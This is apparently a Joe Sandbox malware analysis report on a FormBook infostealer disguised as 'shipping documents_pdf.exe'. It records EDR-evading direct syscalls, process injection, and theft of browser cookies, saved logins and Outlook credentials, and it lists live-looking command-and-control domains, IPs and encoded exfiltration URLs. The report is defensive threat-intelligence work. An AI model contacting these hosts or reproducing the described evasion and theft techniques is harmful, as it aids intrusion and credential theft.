Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]	1_2_02FB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F43740 mov eax, dword ptr fs:[00000030h]	1_2_02F43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F43740 mov eax, dword ptr fs:[00000030h]	1_2_02F43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F43740 mov eax, dword ptr fs:[00000030h]	1_2_02F43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]	1_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]	1_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]	1_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29730 mov eax, dword ptr fs:[00000030h]	1_2_02F29730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29730 mov eax, dword ptr fs:[00000030h]	1_2_02F29730

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: NULL target: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: NULL target: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\schtasks.exe

Thread register set: target process: 6992

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\schtasks.exe

Thread APC queued: target process: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\shipping documents_pdf.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 336008

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping documents_pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: jsmAYDUnVBUZ.exe, 00000002.00000000.1811592874.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3514166321.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000000.1955117684.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: jsmAYDUnVBUZ.exe, 00000002.00000000.1811592874.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3514166321.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000000.1955117684.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: shipping documents_pdf.exe	Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: jsmAYDUnVBUZ.exe, 00000002.00000000.1811592874.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3514166321.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000000.1955117684.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: jsmAYDUnVBUZ.exe, 00000002.00000000.1811592874.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3514166321.00000000010A0000.00000002.00000001.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000000.1955117684.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\schtasks.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	412 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
shipping documents_pdf.exe	24%	ReversingLabs
shipping documents_pdf.exe	33%	Virustotal	Browse
shipping documents_pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
30kfeet.net	0%	Virustotal	Browse
itaja.xyz	0%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.coba168.info/nwnl/	1%	Virustotal		Browse
http://www.meliorahomes.net/v6hi/	1%	Virustotal		Browse
http://www.appointy.shop/a1sy/	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.cctv9.rest	114.134.188.182	true	true		unknown
30kfeet.net	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.appointy.shop	13.248.169.48	true	true		unknown
www.havfabi.life	162.213.249.216	true	true		unknown
itaja.xyz	83.229.19.82	true	true	0%, Virustotal, Browse	unknown
www.meliorahomes.net	8.217.17.192	true	true		unknown
www.mynotebook.shop	13.248.169.48	true	true		unknown
coba168.info	3.33.130.190	true	true		unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	0%, Virustotal, Browse	unknown
cricketinsights.info	118.139.176.2	true	true		unknown
www.coba168.info	unknown	unknown	true		unknown
www.itaja.xyz	unknown	unknown	true		unknown
www.cricketinsights.info	unknown	unknown	true		unknown
www.restobarbebek.xyz	unknown	unknown	true		unknown
www.30kfeet.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.itaja.xyz/piim/	true		unknown
http://www.meliorahomes.net/v6hi/?GX4dS=J4OZQFJkwHb7CqxUSgK5kC7bOCRQ1HDFuBm9sh8+Hwi6g72gNv5/qcE3wP+eGlRxbFCI7z2mPoN0ns0tJj8yIlhQwyv+KQ3WGhFwXvk/5rV44M5qziNnSOc=&QHdD=Mr7PG	true		unknown
http://www.itaja.xyz/piim/?GX4dS=RYsZikA+gzGvj7iZiTCDr+aQt7fmUZTyGCVkHuEfnLcd5+XBs56/1e6IekUyxiYXxJTamO9QBVR7KuXqJ7BSZgW6PH27nc20dnk3ICKQzrrMBcAKjPIq1No=&QHdD=Mr7PG	true		unknown
http://www.restobarbebek.xyz/vyi4/?GX4dS=/xy0pcQoI48O0GHyPYCEmU2R4Hpu0VZORDN/dAaN/HIxdTX0a/Tw+B0GG8XhGWU8PZV29+oHaQZBX3c3szNNFJMBEHP/DJI13k5P4rPNXnp/cIoi/p+Ic+M=&QHdD=Mr7PG	true		unknown
http://www.mynotebook.shop/3q2o/	true		unknown
http://www.cctv9.rest/s7c9/?GX4dS=AvCjDDvglUmypHRh3tcpFDEnXU0eyxJ0gEyBu7LJ6NAS+DraqwYREr+jqcUkWNOrfKJXuGVAM+jH6WkALlmgLCdPJ31xuM0fYjGNAwDkyRY4kQ2+D/EajS4=&QHdD=Mr7PG	true		unknown
http://www.restobarbebek.xyz/vyi4/	true		unknown
http://www.cricketinsights.info/7r21/?GX4dS=Zcl8OC2U2mZSOodQP89hLxJaF9oxIylC3vQVS5j+kQePBp9DPErvqQJ5GN/fq92ZSua+eOkgWypb4NJRPdpqD2l3+Txvj2dKnJzbedJ/jR6LsqpOy2ysxaE=&QHdD=Mr7PG	true		unknown
http://www.havfabi.life/wieb/?QHdD=Mr7PG&GX4dS=eg7bLBeRfjnWkUSkFPDFz7CDjhz4SauAKYy7Gl2+zW+bwKjkoH9UXc52MkveFRCVuGtTn8uwV230S6082MDCqbLQ2LkwAkuHHQvkznNaIdZpiNU96nR7hSc=	true		unknown
http://www.cctv9.rest/s7c9/	true		unknown
http://www.appointy.shop/a1sy/	true	1%, Virustotal, Browse	unknown
http://www.appointy.shop/a1sy/?GX4dS=43kMdQUk4RwRJMi6yD+2w8EPj2c5h/nzCBj69vS+SY4LuE9CgiSoK5ODTlc+3PfTwBmzR2IwCrk+5EAKTw2sMvYmaCzYBStST9GoSzlhXbP5C08N1MLucTc=&QHdD=Mr7PG	true		unknown
http://www.coba168.info/nwnl/	true	1%, Virustotal, Browse	unknown
http://www.coba168.info/nwnl/?GX4dS=beqecatXY4qIJjPXOia4kQmqT9sqBvOCFEuBM0i0Dlt4M9tlrl1tg88laI+FpgcKerQYOIncNJ3shYG/Ub3oJIvQtmlajUKZMxQvi2F/DOJ3YHvB9A08ObE=&QHdD=Mr7PG	true		unknown
http://www.havfabi.life/wieb/	true		unknown
http://www.meliorahomes.net/v6hi/	true	1%, Virustotal, Browse	unknown
http://www.30kfeet.net/prdf/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cricketinsights.info/7r21/?GX4dS=Zcl8OC2U2mZSOodQP89hLxJaF9oxIylC3vQVS5j	schtasks.exe, 00000004.00000002.3516006037.0000000003714000.00000004.10000000.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3514610443.0000000002DC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2176596569.0000000020CE4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mynotebook.shop	jsmAYDUnVBUZ.exe, 00000007.00000002.3515959197.0000000004E63000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	schtasks.exe, 00000004.00000002.3517346598.00000000075BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.217.17.192	www.meliorahomes.net	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
13.248.169.48	www.appointy.shop	United States	16509	AMAZON-02US	true
114.134.188.182	www.cctv9.rest	Cambodia	45429	CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKH	true
118.139.176.2	cricketinsights.info	Singapore	26496	AS-26496-GO-DADDY-COM-LLCUS	true
162.213.249.216	www.havfabi.life	United States	22612	NAMECHEAP-NETUS	true
83.229.19.82	itaja.xyz	United Kingdom	8513	SKYVISIONGB	true
3.33.130.190	30kfeet.net	United States	8987	AMAZONEXPANSIONGB	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522476
Start date and time:	2024-09-30 08:29:47 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	shipping documents_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@10/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 94% Number of executed functions: 24 Number of non-executed functions: 321
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target jsmAYDUnVBUZ.exe, PID 4928 because it is empty
